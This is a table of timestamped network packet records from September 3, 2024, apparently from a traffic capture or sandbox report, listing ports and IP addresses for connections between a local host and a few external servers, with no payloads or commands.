Sep 3, 2024 17:13:21.721862078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721899986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721899986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721909046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721921921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721930981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721944094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721954107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721965075 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.721972942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721972942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.721996069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722011089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722017050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722027063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722078085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722116947 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722129107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722141027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722151041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722173929 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722201109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722254038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722265959 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722280979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722291946 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722304106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722311974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722311974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722316980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722328901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722337008 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722352982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722388029 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722516060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722527981 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722584009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722654104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722666025 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722676039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722687006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722697973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722716093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722728968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722739935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722745895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722745895 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722752094 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722755909 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722765923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722769976 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722817898 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.722865105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722982883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.722994089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723004103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723016024 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723022938 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723027945 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723041058 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723051071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723054886 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723064899 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723084927 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723100901 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723234892 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723246098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723261118 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723277092 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723305941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723305941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723337889 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723572969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723584890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723597050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723609924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723639965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723639965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723891020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723901987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723912954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723922968 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.723959923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.723959923 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724256039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724267006 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724277020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724287987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724298954 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724309921 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724314928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724317074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724317074 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724327087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724338055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724349022 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724378109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724378109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724415064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724426985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724436045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724447012 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724457979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724473000 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724486113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724486113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724495888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724499941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724513054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724524021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724550009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724550009 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724584103 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724704027 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724766016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724771023 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724786997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724819899 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724833965 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.724911928 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.724968910 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725114107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725161076 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725260973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725274086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725284100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725294113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725305080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725316048 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725323915 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725327969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725356102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725399971 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725594997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725613117 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725625038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725639105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725651026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725661993 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725663900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725678921 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725701094 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725791931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725802898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725814104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725825071 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725836039 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725845098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725856066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725867033 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725877047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725877047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725877047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725888014 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725899935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725918055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725923061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725923061 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725929022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725943089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725944042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725953102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.725955963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.725996017 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.726006031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.726006031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.726007938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.726021051 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.726051092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.726051092 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.726073027 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.726093054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.726104021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.726113081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.726142883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.726142883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.749905109 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.749917984 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.749937057 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.749947071 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.749958038 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.749963045 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.749985933 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.749989033 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750000000 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750013113 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750015974 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750025988 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750026941 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750051975 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750061035 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750873089 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750910997 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750920057 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750922918 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.750955105 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750969887 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.750997066 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751008034 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751018047 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751029015 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751039028 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751072884 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751265049 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751276016 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751286030 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751296043 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751298904 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751310110 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751321077 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751332045 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751334906 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751343012 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751353025 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751358032 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.751365900 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751386881 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.751400948 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752046108 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752057076 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752067089 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752078056 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752089024 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752094984 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752099037 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752109051 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752114058 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752121925 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752126932 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752139091 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752146959 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752166986 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752182961 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752193928 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752208948 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752219915 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752229929 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752230883 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752242088 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752245903 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.752264977 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.752285957 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.753263950 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.753274918 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.753283978 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:21.753305912 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.753329039 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:21.772133112 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:21.773602009 CEST	49722	45580	192.168.2.8	65.21.18.51
Sep 3, 2024 17:13:21.778749943 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:21.816593885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816615105 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816623926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816689014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.816689014 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.816703081 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816715956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816725969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816736937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816770077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.816801071 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.816818953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816837072 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816890001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.816890001 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.816960096 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.816971064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817018986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817048073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817059040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817095041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817106009 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817109108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817118883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817128897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817171097 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817188025 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817259073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817269087 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817280054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817311049 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817334890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817503929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817516088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817522049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817532063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817537069 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817545891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817564011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817575932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817581892 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817593098 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817616940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817636967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817703962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817713976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817727089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817734957 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817739010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817753077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817759037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817765951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817779064 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817790985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817791939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817804098 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.817805052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817843914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.817862988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.818099976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.818109989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.818120003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.818126917 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.818131924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.818137884 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.818142891 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.818222046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.820549011 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820560932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820575953 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820588112 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820604086 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820615053 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.820620060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820632935 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820664883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.820664883 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:21.820862055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820873022 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820888996 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820899963 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820910931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:21.820921898 CEST	80	49730	52.212.52.84	192.168.2.8
